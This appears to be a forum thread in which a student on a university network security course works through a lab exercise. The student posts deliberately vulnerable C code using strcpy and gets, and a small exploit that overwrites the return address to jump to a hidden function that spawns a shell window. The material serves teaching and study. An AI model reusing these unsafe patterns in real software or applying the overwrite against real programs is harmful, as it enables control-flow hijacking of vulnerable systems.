Easy memory address question

Hi all,

I'm studying exploits at University and buffer overflows with unsafe functions. Am I correct in saying that from the memory address 0x0804857e to 0x08048599 is 27 bytes?
If I'm wrong, could someone please take the time to explain this to me? I don't do computer science and am failing to see the logic in this.

Thanks :(
 
A Computer Network Management one which involves a network security module. This means we study things like IP traceback etc and software vulnerabilities such as buffer overflow etc.
 
Thanks for your input. Not being particularly knowledgeable to start with, I'd say this is certainly pointer arithmetic. As far as I understand I'm trying to compromise some simple sample code to cause a buffer overflow and insert a pointer address so that it immediately runs another function in the code, i.e.:

vulnerable code

Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void secretArea (void)
{
puts("Congratulation you have access!");
system("xterm");
}

int checkName(int argc, char **argv)
{
char Ubuffer [10];
if (argc>1)
  strcpy(Ubuffer,argv[1]);   /* unbounded copy: an argument longer than 9 characters overflows Ubuffer */
if (!strcmp(Ubuffer,"Ted"))  
  {
  printf("Hello Ted");
  return 1;
  }
printf("Wrong Name\n");
return 0;
}

int main (int argc, char **argv)
{
char Pbuffer [20];
if (!checkName(argc,argv)) 
  return 0;
printf("\nPlease enter password: ");
gets(Pbuffer);               /* gets() has no length limit: a long line overflows Pbuffer */
if (!strcmp(Pbuffer,"password"))
  {
  secretArea();
  }
return 0;
}

exploit code:

Code:
#include <stdio.h>
#include <stdlib.h>

int main (void)
{
char address[0];               /* payload length: this is the size I still need to work out */
int i = 0;
for (i=0;i<sizeof(address);i+=4)   /* was i<=sizeof(address), which writes one word past the array */
  {
  *(long*)&address[i]=0x0;     /* placeholder value, to be replaced by the address from gdb */
  }
puts(address);
return 0;
}

I've used gdb to disassemble the main function in the vulnerable code so I can see what the address for the secretArea function is (this is what I want to run after overflow in checkName). The problem I'm having is getting the right size of address array in bytes, reflecting the start of the array to the return address, something which confuses me a little. Essentially so the correct memory value is in the register when executed.

I could be talking complete crap here :)

I think this stuff is covered in the famous phrack paper, "Stack Smashing for Fun and Profit" or something, but that also makes my head hurt :D
 
Thanks, I can certainly see what you're doing there. I have something similar:

28 bytes in total to overwrite the EIP with the memory address of the function you want to go to.. (is this the right way to think about it?)

Code:
#include <stdio.h>
#include <stdlib.h>

int main (void)
{
char address[28 + 1];            /* 28 bytes of payload plus room for the terminator puts() needs */
int i = 0;
for (i=0;i<28;i+=4)              /* was i<=sizeof(address), which wrote one word past the array */
  {
  *(unsigned int*)&address[i]=0x8048470;   /* 4-byte write (long was 4 bytes on the 32-bit target) */
  }
address[28]='\0';
puts(address);
return 0;
}

And that cracked it. So above the array allocation in the stack, this means I need 28-12 = 16 bytes, so most likely 4 x 4 bytes. So what are the registers above the stack, and how can I see them in gdb? I presume in your example, esb is a register, but I don't see any eip when disassembling?

Also, I'm trying to overflow the checkName buffer of [10], that is in fact [12] due to having to be a multiple of 4. Is that an architectural thing, or just simply because it uses hex?

Thanks for taking the time :)
 
It's become a lot clearer now and I can see quite clearly what I'm trying to do. Thanks again for your help, I'm going to watch that video now :)
 